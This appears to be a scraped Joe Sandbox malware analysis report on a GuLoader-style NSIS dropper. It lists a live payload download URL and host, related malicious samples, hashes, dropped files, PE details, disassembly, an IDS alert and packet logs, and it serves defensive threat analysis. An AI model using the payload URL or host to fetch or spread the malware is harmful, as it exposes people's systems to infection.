        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdNtwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          		high
          https://babalharra.com.au/yzSJO174.binKNtwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.ftp.ftp://ftp.gopher.Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            		high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdNtwph4urc1.exe, 00000006.00000001.2690896248.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorErrorNtwph4urc1.exe, 00000000.00000000.2173648853.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000006.00000000.2688245914.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                		high
                https://babalharra.com.au/Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://babalharra.com.au/ESNtwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  122.201.127.17
                  		babalharra.com.auAustralia
                  		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588721
                  Start date and time:2025-01-11 04:40:10 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Ntwph4urc1.exe
                  renamed because original name is a hash value
                  Original Sample Name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@3/5@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 41
                  • Number of non-executed functions: 306
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  22:42:35API Interceptor3x Sleep call for process: Ntwph4urc1.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  122.201.127.1702Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        babalharra.com.au02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        http://www.austrata.net.auGet hashmaliciousUnknownBrowse
                        • 185.184.154.201
                        https://snip.ly/kx81x2Get hashmaliciousUnknownBrowse
                        • 203.170.87.17
                        la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                        • 103.226.223.88
                        https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.comGet hashmaliciousUnknownBrowse
                        • 203.170.84.122
                        Last Annual payment.htmGet hashmaliciousPhisherBrowse
                        • 203.170.84.122
                        http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.jsGet hashmaliciousUnknownBrowse
                        • 203.170.86.89
                        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                        • 103.20.200.105
                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                        • 203.170.87.17

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e192976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                        • 122.201.127.17
                        yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                        • 122.201.127.17
                        yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 122.201.127.17
                        LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                        • 122.201.127.17
                        4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 122.201.127.17
                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                        • 122.201.127.17

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          02Eh1ah35H.exeGet hashmaliciousGuLoaderBrowse
                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              Document_084462.scr.exeGet hashmaliciousGuLoaderBrowse
                                PO.exeGet hashmaliciousGuLoaderBrowse
                                  PO.exeGet hashmaliciousGuLoaderBrowse
                                    yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                      yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                        IMAGE000Pdf.exeGet hashmaliciousGuLoaderBrowse
                                          stormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll

                                            Download File
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):5.737556724687435
                                            Encrypted:false
                                            SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                            MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                            SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                            SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                            SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                            • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                            • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                            • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                            • Filename: PO.exe, Detection: malicious, Browse
                                            • Filename: PO.exe, Detection: malicious, Browse
                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                            • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                            • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                            • Filename: stormskridtets.exe, Detection: malicious, Browse
                                            Reputation:moderate, very likely benign file
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl

                                            Download File
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):116773
                                            Entropy (8bit):1.2617404262864118
                                            Encrypted:false
                                            SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                            MD5:753C4F9B2F84095556E2C65E2569D814
                                            SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                            SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                            SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                            Malicious:false
                                            Reputation:low
                                            Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.biv

                                            Download File
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):222131
                                            Entropy (8bit):1.2548431305039245
                                            Encrypted:false
                                            SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                            MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                            SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                            SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                            SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                            Malicious:false
                                            Reputation:low
                                            Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.War

                                            Download File
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):282823
                                            Entropy (8bit):7.646614769640198
                                            Encrypted:false
                                            SSDEEP:6144:lvvE12Nsu4oMNgJMD20aAW49+ShpU5tgrLMpaP:lXmkMNOZq+Sh1rL4Y
                                            MD5:9CE7FE4FC49B74D4A9E8E63C97EDA3D7
                                            SHA1:0DF4A59A5F43A5A406B28D449369D25B4EA35B49
                                            SHA-256:ECB2D16F05215EE09B30050618170CBFD7B6E52D128B4429F69D1B419974842C
                                            SHA-512:7F55112F98B31966A41DBD77AA416BA8964CE689679E2EA4C218398FBAD1319C5ABDE73222DCDCD6CEB53F5A1224234427F611686DD44DB29919230587782C98
                                            Malicious:false
                                            Reputation:low
                                            Preview:.....kk.t...[[[[.......S...Z........................33...u...,........U......f...pp...........`............................................`...............W............II....l......................,,,...........kk.........99.............................?.N......##.......xx...F........%.n...T........vvv...................."....................:...........pp..++......IIIII...$...{..{.uu....................4444..$.E.%..#........................v.......................L..{...;.GG....mm.......oo.J.K...P.JJJ.......}}.....//..........RR.........................%%%%.....8..9.......F...ll........................j..........gg......%%........o................#......WWWWW.............................*......R............s.....HH...................i.HH....P.....d.......p.................D......---....NN.......yy.j...................99................?.........................[[....>>>>..................................LL...........U....................4...$...`....55....................J.=..........

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.sti

                                            Download File
                                            Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):477418
                                            Entropy (8bit):1.2516735777117096
                                            Encrypted:false
                                            SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                            MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                            SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                            SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                            SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                            Malicious:false
                                            Reputation:low
                                            Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Entropy (8bit):7.957710020525607
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:Ntwph4urc1.exe
                                            File size:437'610 bytes
                                            MD5:c57da1bb37a79e6f05722518dbadb3ce
                                            SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
                                            SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
                                            SHA512:872e1e462cd6ebdd2140463fa8ad91675840a754b4c3ef52641c7bcfdb4d8951decbffb284344e9a8a2c2ad93d8821ea973eac6d434552d7a88236a1a054f933
                                            SSDEEP:12288:B3UIjsVFWZn9dzBoT2T/B1iP4C5tU2US0zT:B3UIjsVFWZf1oPPbU2US0z
                                            TLSH:F3942384B2D0A337D9EB6F31693A23321E9D48505C7DB3434F5C7A10773968A9B2E7A1
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

                                            File Icon

                                            Icon Hash:3d2e0f95332b3399

                                            Static PE Info

                                            General

                                            Entrypoint:0x4034a2
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                            Entrypoint Preview

                                            Instruction
                                            sub esp, 000002D4h
                                            push ebx
                                            push esi
                                            push edi
                                            push 00000020h
                                            pop edi
                                            xor ebx, ebx
                                            push 00008001h
                                            mov dword ptr [esp+14h], ebx
                                            mov dword ptr [esp+10h], 0040A2E0h
                                            mov dword ptr [esp+1Ch], ebx
                                            call dword ptr [004080CCh]
                                            call dword ptr [004080D0h]
                                            and eax, BFFFFFFFh
                                            cmp ax, 00000006h
                                            mov dword ptr [007A8A6Ch], eax
                                            je 00007FF5C0D93913h
                                            push ebx
                                            call 00007FF5C0D96C01h
                                            cmp eax, ebx
                                            je 00007FF5C0D93909h
                                            push 00000C00h
                                            call eax
                                            mov esi, 004082B0h
                                            push esi
                                            call 00007FF5C0D96B7Bh
                                            push esi
                                            call dword ptr [00408154h]
                                            lea esi, dword ptr [esi+eax+01h]
                                            cmp byte ptr [esi], 00000000h
                                            jne 00007FF5C0D938ECh
                                            push 0000000Bh
                                            call 00007FF5C0D96BD4h
                                            push 00000009h
                                            call 00007FF5C0D96BCDh
                                            push 00000007h
                                            mov dword ptr [007A8A64h], eax
                                            call 00007FF5C0D96BC1h
                                            cmp eax, ebx
                                            je 00007FF5C0D93911h
                                            push 0000001Eh
                                            call eax
                                            test eax, eax
                                            je 00007FF5C0D93909h
                                            or byte ptr [007A8A6Fh], 00000040h
                                            push ebp
                                            call dword ptr [00408038h]
                                            push ebx
                                            call dword ptr [00408298h]
                                            mov dword ptr [007A8B38h], eax
                                            push ebx
                                            lea eax, dword ptr [esp+34h]
                                            push 000002B4h
                                            push eax
                                            push ebx
                                            push 0079FF08h
                                            call dword ptr [0040818Ch]
                                            push 0040A2C8h

                                            Rich Headers

                                            Programming Language:
                                            • [EXP] VC++ 6.0 SP5 build 8804

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000xb48.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x3a90000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x3c70000xb480xc0013d9a87cc14830e1f01c641a62386bbeFalse0.4215494791666667data4.357284806500026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0x3c71c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                            RT_DIALOG0x3c74a80x100dataEnglishUnited States0.5234375
                                            RT_DIALOG0x3c75a80x11cdataEnglishUnited States0.6056338028169014
                                            RT_DIALOG0x3c76c80xc4dataEnglishUnited States0.5918367346938775
                                            RT_DIALOG0x3c77900x60dataEnglishUnited States0.7291666666666666
                                            RT_GROUP_ICON0x3c77f00x14dataEnglishUnited States1.2
                                            RT_MANIFEST0x3c78080x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                            Imports

                                            DLLImport
                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-01-11T04:42:16.439704+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649986122.201.127.17443TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 11, 2025 04:42:14.930769920 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:14.930808067 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:14.930896997 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:14.949330091 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:14.949357986 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:15.917403936 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:15.917479038 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:15.968607903 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:15.968625069 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:15.969563007 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:15.969626904 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:15.975368977 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.019324064 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.439768076 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.439851999 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.439927101 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.439953089 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.440009117 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.440115929 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.651684046 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.651720047 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.651833057 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.651915073 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.651915073 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.651943922 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.651987076 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.652976990 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.653053045 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.653938055 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.654014111 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.865792036 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.865807056 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.865856886 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.866513014 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.866566896 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.867405891 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.867469072 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.867599964 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.867649078 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.868515015 CET44349986122.201.127.17192.168.2.6
                                            Jan 11, 2025 04:42:16.868573904 CET49986443192.168.2.6122.201.127.17
                                            Jan 11, 2025 04:42:16.869285107 CET44349986122.201.127.17192.168.2.6
